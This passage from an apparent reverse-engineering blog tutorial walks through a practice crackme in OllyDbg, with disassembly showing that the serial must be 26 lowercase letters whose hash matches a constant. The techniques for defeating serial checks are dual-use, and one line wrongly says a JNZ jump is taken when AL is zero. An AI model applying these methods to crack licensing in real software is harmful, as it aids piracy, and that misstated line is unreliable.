target="_blank"entry point/a of the application (code004012DE/code), this is where execution of the application starts and these are the CPU instructions that are going to run./p pWe can check this using codedumpbin/code with the following command: codedumpbin /headers "C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe" | find /i "entry point"/code/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 12DE entry point (004012DE)/span/span span class="code-line"/code/pre/div /td/tr/table pThe columns are from left to right, the memory address of the instruction, the hex representation of the instruction, the ia-32 assembly representation and finally notes that Olly puts there for us./p pThe top right section contains the values of the a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a, these are used primarily as storage for the CPU while it is running instructions. There are a couple of special ones which I'll explain if I need to./p pThe format is: code[CPU register name] [value] [Olly notes]/code/p pThe bottom right section is the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a window and shows the current status of the stack, the stack is used to store function arguments and local variables as well as a few other things./p pThe columns are from left to right, memory address, 4 byte hex value at that memory address, Olly notes/p pThe bottom left section is the dump window and can be used to dump certain bits of memory to see what is there./p pThe dump window has titles for its columns./p pLet's see if there are any interesting strings in here, right click anywhere and click on emSearch for-gt;All referenced text strings/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-look-for-strings.png" width="800"/p pYou should see the strings window with 4 entries:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-strings-window.png" width="800"/p pThe third entry down looks promising (strongSuccess/strong)./p pLet's have a look where in the application this is, right click on it and click emFollow in Disassembler/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-follow-string.png" width="800"/p pYou should see something like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-serial-check-call.png" width="800"/p pAs you can see the function call is to codeMessageBoxA/code, this is where we want to end up./p pJust above the function call are the instructions that decide whether or not the bit of code that calls codeMessageBoxA/code is run (strongI've highlighted the relevant rows/strong)./p h2Understanding The Authentication Logic/h2 pThis is basically just calling some internal function at code00401000/code then using the return value to decide whether or not to jump to code004012CA/code. If the return value is code0/code the jump happens./p pThis is the code at code004012CA/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004012CA |gt; 5F POP EDI/span/span span class="code-line"span class="x"004012CB |. 5E POP ESI/span/span span class="code-line"span class="x"004012CC |. 33C0 XOR EAX,EAX/span/span span class="code-line"span class="x"004012CE |. 5B POP EBX/span/span span class="code-line"span class="x"004012CF |. 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004012D1 |. 5D POP EBP/span/span span class="code-line"span class="x"004012D2 \. C2 1000 RETN 10/span/span span class="code-line"/code/pre/div /td/tr/table pIt just exits so we don't want to end up here, this is the fail case./p pLet's look inside this function to see what it does, right click on the function call (at code0040129D/code) and click emFollow/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-check-function-menu.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-crypt-function.png" width="800"/p pThis is the function that decides if our name and/or serial are correct. Here is the full disassembly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401000 $ 55 PUSH EBP/span/span span class="code-line"span class="x"00401001 . 8BEC MOV EBP,ESP/span/span span class="code-line"span class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"span class="x"00401005 . 83EC 20 SUB ESP,20/span/span span class="code-line"span class="x"00401008 . 56 PUSH ESI/span/span span class="code-line"span class="x"00401009 . 33F6 XOR ESI,ESI/span/span span class="code-line"span class="x"0040100B . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"0040100D . 0F84 B3000000 JE SomeCryp.004010C6/span/span span class="code-line"span class="x"00401013 . 8D55 E0 LEA EDX,DWORD PTR SS:[EBP-20]/span/span span class="code-line"span class="x"00401016 . 2BD1 SUB EDX,ECX/span/span span class="code-line"span class="x"00401018 gt; 3C 61 CMP AL,61/span/span span class="code-line"span class="x"0040101A . 0F8C A6000000 JL SomeCryp.004010C6/span/span span class="code-line"span class="x"00401020 . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"00401022 . 0F8F 9E000000 JG SomeCryp.004010C6/span/span span class="code-line"span class="x"00401028 . 88040A MOV BYTE PTR DS:[EDX+ECX],AL/span/span span class="code-line"span class="x"0040102B . 8A41 01 MOV AL,BYTE PTR DS:[ECX+1]/span/span span class="code-line"span class="x"0040102E . 41 INC ECX/span/span span class="code-line"span class="x"0040102F . 46 INC ESI/span/span span class="code-line"span class="x"00401030 . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"00401032 .^75 E4 JNZ SHORT SomeCryp.00401018/span/span span class="code-line"span class="x"00401034 . 83FE 1A CMP ESI,1A/span/span span class="code-line"span class="x"00401037 . 0F85 89000000 JNZ SomeCryp.004010C6/span/span span class="code-line"span class="x"0040103D . 33C0 XOR EAX,EAX/span/span span class="code-line"span class="x"0040103F . 90 NOP/span/span span class="code-line"span class="x"00401040 gt; 8A88 10304000 MOV CL,BYTE PTR DS:[EAX+403010]/span/span span class="code-line"span class="x"00401046 . 8888 40314000 MOV BYTE PTR DS:[EAX+403140],CL/span/span span class="code-line"span class="x"0040104C . 40 INC EAX/span/span span class="code-line"span class="x"0040104D . 84C9 TEST CL,CL/span/span span class="code-line"span class="x"0040104F .^75 EF JNZ SHORT SomeCryp.00401040/span/span span class="code-line"span class="x"00401051 . 33C9 XOR ECX,ECX/span/span span class="code-line"span class="x"00401053 . 380D 40314000 CMP BYTE PTR DS:[403140],CL/span/span span class="code-line"span class="x"00401059 . 74 2D JE SHORT SomeCryp.00401088/span/span span class="code-line"span class="x"0040105B . EB 03 JMP SHORT SomeCryp.00401060/span/span span class="code-line"span class="x"0040105D 8D49 00 LEA ECX,DWORD PTR DS:[ECX]/span/span span class="code-line"span class="x"00401060 gt; 8A81 40314000 MOV AL,BYTE PTR DS:[ECX+403140]/span/span span class="code-line"span class="x"00401066 . 3C 61 CMP AL,61/span/span span class="code-line"span class="x"00401068 . 7C 14 JL SHORT SomeCryp.0040107E/span/span span class="code-line"span class="x"0040106A . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"0040106C . 7F 10 JG SHORT SomeCryp.0040107E/span/span span class="code-line"span class="x"0040106E . 0E PUSH CS/span/span span class="code-line"span class="x"0040106F . BE C08A9405 MOV ESI,5948AC0/span/span span class="code-line"span class="x"00401074 . 7F FF JG SHORT SomeCryp.00401075/span/span span class="code-line"span class="x"00401076 FF DB FF/span/span span class="code-line"span class="x"00401077 FF DB FF/span/span span class="code-line"span class="x"00401078 . 8891 40314000 MOV BYTE PTR DS:[ECX+403140],DL/span/span span class="code-line"span class="x"0040107E gt; 41 INC ECX/span/span span class="code-line"span class="x"0040107F . 80B9 40314000 gt;CMP BYTE PTR DS:[ECX+403140],0/span/span span class="code-line"span class="x"00401086 .^75 D8 JNZ SHORT SomeCryp.00401060/span/span span class="code-line"span class="x"00401088 gt; 83C8 FF OR EAX,FFFFFFFF/span/span span class="code-line"span class="x"0040108B . BA 40314000 MOV EDX,SomeCryp.00403140/span/span span class="code-line"span class="x"00401090 . 85C9 TEST ECX,ECX/span/span span class="code-line"span class="x"00401092 . 74 19 JE SHORT SomeCryp.004010AD/span/span span class="code-line"span class="x"00401094 gt; 0FB632 MOVZX ESI,BYTE PTR DS:[EDX]/span/span span class="code-line"span class="x"00401097 . 33F0 XOR ESI,EAX/span/span span class="code-line"span class="x"00401099 . 81E6 FF000000 AND ESI,0FF/span/span span class="code-line"span class="x"0040109F . C1E8 08 SHR EAX,8/span/span span class="code-line"span class="x"004010A2 . 3304B5 5820400gt;XOR EAX,DWORD PTR DS:[ESI*4+402058]/span/span span class="code-line"span class="x"004010A9 . 42 INC EDX/span/span span class="code-line"span class="x"004010AA . 49 DEC ECX/span/span span class="code-line"span class="x"004010AB .^75 E7 JNZ SHORT SomeCryp.00401094/span/span span class="code-line"span class="x"004010AD gt; F7D0 NOT EAX/span/span span class="code-line"span class="x"004010AF . 3D 18B291F8 CMP EAX,F891B218/span/span span class="code-line"span class="x"004010B4 . 75 10 JNZ SHORT SomeCryp.004010C6/span/span span class="code-line"span class="x"004010B6 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]/span/span span class="code-line"span class="x"004010B9 . C700 40314000 MOV DWORD PTR DS:[EAX],SomeCryp.00403140/span/span span class="code-line"span class="x"004010BF . B0 01 MOV AL,1/span/span span class="code-line"span class="x"004010C1 . 5E POP ESI/span/span span class="code-line"span class="x"004010C2 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010C4 . 5D POP EBP/span/span span class="code-line"span class="x"004010C5 . C3 RETN/span/span span class="code-line"span class="x"004010C6 gt; 32C0 XOR AL,AL/span/span span class="code-line"span class="x"004010C8 . 5E POP ESI/span/span span class="code-line"span class="x"004010C9 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010CB . 5D POP EBP/span/span span class="code-line"span class="x"004010CC . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pHere I will go over this code in detail and try to understand what it is doing./p pFirst it starts with the function prologue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401000 $ 55 PUSH EBP/span/span span class="code-line"span class="x"00401001 . 8BEC MOV EBP,ESP/span/span span class="code-line"/code/pre/div /td/tr/table pThis is common among all stdcall and cdecl functions, it just sets up the stack frame (for more information about stack frames check out the "Stack Frames" section of my post on a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"basic binary auditing/a)./p pThe next instruction is interesting:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"/code/pre/div /td/tr/table pThis is using the ECX register before anything has been done to it in this function. This means that whatever is stored in ECX was stored there in the calling function and it was passed as an argument to this current function./p pThe reason it was passed in a register instead of on the stack (how arguments are normally passed) is because the compiler knew it was in control of all points of entry into this function./p pThe most likely way that the compiler would have known this is if the function was explicitly defined with the strongstatic/strong keyword. This means that only functions inside the same source file can call this function./p pTo figure out what is stored in ECX at this point in the application without running it, we will need to look back through the code that called this function, here is that code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401267 |. 8B3D 40204000 MOV EDI,DWORD PTR DS:[lt;amp;USER32.GetDlgItemTextAgt;] ; USER32.GetDlgItemTextA/span/span span class="code-line"span class="x"0040126D |. 6A 40 PUSH 40 ; /Count = 40 (64.)/span/span span class="code-line"span class="x"0040126F |. 8D8C24 C4000000 LEA ECX,DWORD PTR SS:[ESP+C4] ; |/span/span span class="code-line"span class="x"00401276 |. 51 PUSH ECX ; |Buffer/span/span span class="code-line"span class="x"00401277 |. 68 E9030000 PUSH 3E9 ; |ControlID = 3E9 (1001.)/span/span span class="code-line"span class="x"0040127C |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"0040127D |. FFD7 CALL EDI ; \GetDlgItemTextA/span/span span class="code-line"span class="x"0040127F |. 6A 40 PUSH 40 ; /Count = 40 (64.)/span/span span class="code-line"span class="x"00401281 |. 8D9424 84000000 LEA EDX,DWORD PTR SS:[ESP+84] ; |/span/span span class="code-line"span class="x"00401288 |. 52 PUSH EDX ; |Buffer/span/span span class="code-line"span class="x"00401289 |. 68 EA030000 PUSH 3EA ; |ControlID = 3EA (1002.)/span/span span class="code-line"span class="x"0040128E |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"0040128F |. FFD7 CALL EDI ; \GetDlgItemTextA/span/span span class="code-line"span class="x"00401291 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]/span/span span class="code-line"span class="x"00401295 |. 50 PUSH EAX/span/span span class="code-line"span class="x"00401296 |. 8D8C24 84000000 LEA ECX,DWORD PTR SS:[ESP+84]/span/span span class="code-line"span class="x"0040129D |. E8 5EFDFFFF CALL SomeCryp.00401000/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see there are 2 calls to codeGetDlgItemTextA/code and we have 2 fields (Name and Serial). But at this time we don't know which field is which however we do have their ID's./p pThe prototype for codeGetDlgItemTextA/code is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"UINT/spanspan class="w" /spanspan class="n"WINAPI/spanspan class="w" /spanspan class="n"GetDlgItemText/spanspan class="p"(/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"HWND/spanspan class="w" /spanspan class="n"hDlg/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nIDDlgItem/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_Out_/spanspan class="w" /spanspan class="n"LPTSTR/spanspan class="w" /spanspan class="n"lpString/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nMaxCount/spanspan class="w"/span/span span class="code-line"span class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAnd from the a href="http://msdn.microsoft.com/en-gb/library/windows/desktop/ms645489%28v=vs.85%29.aspx" target="_blank"manual page/a for it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"hDlg [in]/span/span span class="code-line"span class="go" Type: HWND/span/span span class="code-line"span class="go" A handle to the dialog box that contains the control./span/span span class="code-line"span class="go"nIDDlgItem [in]/span/span span class="code-line"span class="go" Type: int/span/span span class="code-line"span class="go" The identifier of the control whose title or text is to be retrieved./span/span span class="code-line"span class="go"lpString [out]/span/span span class="code-line"span class="go" Type: LPTSTR/span/span span class="code-line"span class="go" The buffer to receive the title or text./span/span span class="code-line"span class="go"nMaxCount [in]/span/span span class="code-line"span class="go" Type: int/span/span span class="code-line"span class="go" The maximum length, in characters, of the string to be copied to the buffer pointed to by lpString. If the length of the string, including the null character, exceeds the limit, the string is truncated./span/span span class="code-line"/code/pre/div /td/tr/table pSo the second argument is the ID of the field and the third is the buffer that the text is going to be stored in./p pThis means that we are looking for the control with ID 3EA. Line 16 (on the disassembly of the 2 calls to codeGetDlgItemTextA/code above) shows that ECX is being loaded with the address of ESP+84, just before ESP+84 is loaded as the buffer argument to codeGetDlgItemTextA/code with an ID of 3EA./p pIf you remember back to when we used codedumpbin/code to list all of the imported functions, there was also a function called codeSetDlgItemTextA/code being imported./p pThis function is likely used to set the values to "Enter you name..." and "Enter your serial...". We can use this to figure out which of these ID's (code3E9/code or code3EA/code) is the serial field and which is the name field; and ultimately which is being passed to our checking function in ECX./p pWe could use the strings window again and find out where "Enter you name..." and "Enter your serial..." are referenced but I'll show you a different way to find them using the function name (codeSetDlgItemTextA/code)./p pFirst close OllyDBG, open it again and open the crackme again so that you get to this point again:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-open.png" width="800"/p pRight click anywhere and click emSearch for-gt;All intermodular calls/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-menu.png" width="800"/p pAfter that, this window should pop up:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-window.png"/p pYou can see the second and third entries are calls to codeSetDlgItemTextA/code, looking at the addresses on the left these calls are right next to each other./p pRight click on 1 of them and click emFollow in Disassembler/em or press emEnter/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-follow.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-setdlgitemtexta-calls.png" width="800"/p pHere is the disassembly of these calls:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401116 |. 8B3D 48204000 MOV EDI,DWORD PTR DS:[lt;amp;USER32.SetDlgItegt;; USER32.SetDlgItemTextA/span/span span class="code-line"span class="x"0040111C |. 68 60244000 PUSH SomeCryp.00402460 ; /Text = quot;Enter your name...quot;/span/span span class="code-line"span class="x"00401121 |. 68 E9030000 PUSH 3E9 ; |ControlID = 3E9 (1001.)/span/span span class="code-line"span class="x"00401126 |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"00401127 |. FFD7 CALL EDI ; \SetDlgItemTextA/span/span span class="code-line"span class="x"00401129 |. 68 74244000 PUSH SomeCryp.00402474 ; /Text = quot;Enter your serial...quot;/span/span span class="code-line"span class="x"0040112E |. 68 EA030000 PUSH 3EA ; |ControlID = 3EA (1002.)/span/span span class="code-line"span class="x"00401133 |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"00401134 |. FFD7 CALL EDI ; \SetDlgItemTextA/span/span span class="code-line"/code/pre/div /td/tr/table pThe a href="http://msdn.microsoft.com/en-gb/library/windows/desktop/ms645521%28v=vs.85%29.aspx" target="_blank"prototype/a for this function is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"BOOL/spanspan class="w" /spanspan class="n"WINAPI/spanspan class="w" /spanspan class="n"SetDlgItemText/spanspan class="p"(/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"HWND/spanspan class="w" /spanspan class="n"hDlg/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nIDDlgItem/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"LPCTSTR/spanspan class="w" /spanspan class="n"lpString/spanspan class="w"/span/span span class="code-line"span class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pLooking at this its obvious that the control with ID 3EA is the serial number field because it is being set to "Enter your serial..."./p pWe can verify this by setting a a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoint/a at the top of the serial checking function, running the application and checking the value of the ECX register./p pFirst go to the check function again:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-crypt-function.png" width="800"/p pThen right click on the top instruction (at address code00401000/code) and click emBreakpoint-gt;Toggle/em or press emF2/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-set-breakpoint-crypt-function.png" width="800"/p pYou should then see the background of the address section (on the far left) turn red:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-set-breakpoint-crypt-function2.png" width="800"/p pThen run the application by clicking emDebug-gt;Run/em or pressing emF9/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-run-crackme.png" width="800"/p pYou should see this after the breakpoint is hit (it shouldn't take long for the breakpoint to hit):/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-breakpoint-hit.png" width="800"/p pAs you can see in the registers window (in the top right), the value of ECX is the address that contains the string "Enter your serial..." so our static analysis of the code was correct./p pNow we can get back to analysing the code in this serial checking function./p pThe following is the start of the function excluding the prologue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"span class="x"00401005 . 83EC 20 SUB ESP,20/span/span span class="code-line"span class="x"00401008 . 56 PUSH ESI/span/span span class="code-line"span class="x"00401009 . 33F6 XOR ESI,ESI/span/span span class="code-line"span class="x"0040100B . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"0040100D . 0F84 B3000000 JE SomeCryp.004010C6/span/span span class="code-line"span class="x"00401013 . 8D55 E0 LEA EDX,DWORD PTR SS:[EBP-20]/span/span span class="code-line"span class="x"00401016 . 2BD1 SUB EDX,ECX/span/span span class="code-line"/code/pre/div /td/tr/table pThe first line loads the first byte of our serial into the AL register (The lower byte of the EAX register)./p pSome space is then reserved on the stack for a local variable. On line 3 the value of the ESI register is saved on the stack and zero'ed out (xor'ing anything with itself makes the result 0)./p pThe byte in the AL register (at this point in time the first character in our serial) is checked for 0 on line 5 and if it is 0 execution jumps to code004010C6/code./p pLet's look at the code at code004010C6/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004010C6 gt; 32C0 XOR AL,AL/span/span span class="code-line"span class="x"004010C8 . 5E POP ESI/span/span span class="code-line"span class="x"004010C9 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010CB . 5D POP EBP/span/span span class="code-line"span class="x"004010CC . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pThis clearly just sets the return value to code0/code and returns, we already know that we don't want a return value of code0/code so this is our failure case./p pFollowing the jump we have an LEA instruction, which loads the value of our local variable, and a SUB command, which calculates the distance from the local variable to where our serial is in memory./p pThe result of these 2 instructions (the distance from the local variable to where our serial is in memory) is stored in the EDX register./p pNext we have the following loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401018 gt; 3C 61 CMP AL,61/span/span span class="code-line"span class="x"0040101A . 0F8C A6000000 JL SomeCryp.004010C6/span/span span class="code-line"span class="x"00401020 . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"00401022 . 0F8F 9E000000 JG SomeCryp.004010C6/span/span span class="code-line"span class="x"00401028 . 88040A MOV BYTE PTR DS:[EDX+ECX],AL/span/span span class="code-line"span class="x"0040102B . 8A41 01 MOV AL,BYTE PTR DS:[ECX+1]/span/span span class="code-line"span class="x"0040102E . 41 INC ECX/span/span span class="code-line"span class="x"0040102F . 46 INC ESI/span/span span class="code-line"span class="x"00401030 . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"00401032 .^75 E4 JNZ SHORT SomeCryp.00401018/span/span span class="code-line"/code/pre/div /td/tr/table pThis is checking if the value in AL is below 61 (lines 1 and 2) or above 7A (lines 3 and 4) and jumping to code004010C6/code if it is./p pLooking at the a href="http://web.cs.mun.ca/~michael/c/ascii-table.html" target="_blank"ascii table/a 61 is stronga/strong and 7A is strongz/strong./p pSo if the first character is not a lowercase letter, execution will jump to the same failure case as before./p pIf the jumps aren't taken the byte is moved to the address pointed to by codeEDX+ECX/code on line 5. This will point to the right position in the local variable due to the earlier codeSUB/code command./p pThen (on line 6) the next byte in the serial is moved into AL, both ECX and ESI are incremented. Lastly, on lines 9 and 10, AL is checked for 0 and the jump to code00401018/code is only taken if AL is 0./p pThis is clearly just making sure only lowercase letters are part of the serial, so at least we now know the possible different characters that are allowed in the serial./p pAnother thing to notice here is that ESI is being used as a counter and at the end will contain the number of characters in the serial./p pLet's look at the 2 lines following this loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401034 . 83FE 1A CMP ESI,1A/span/span span class="code-line"span class="x"00401037 . 0F85 89000000 JNZ SomeCryp.004010C6/span/span span class="code-line"/code/pre/div /td/tr/table pIf you'll remember, ESI contains the number of characters in the serial and here its being checked against code1A/code (or 26 in decimal). If ESI isn't equal to 26 then our failure case is taken again (code004010C6/code)./p pWe then zero out EAX and onto the next loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span 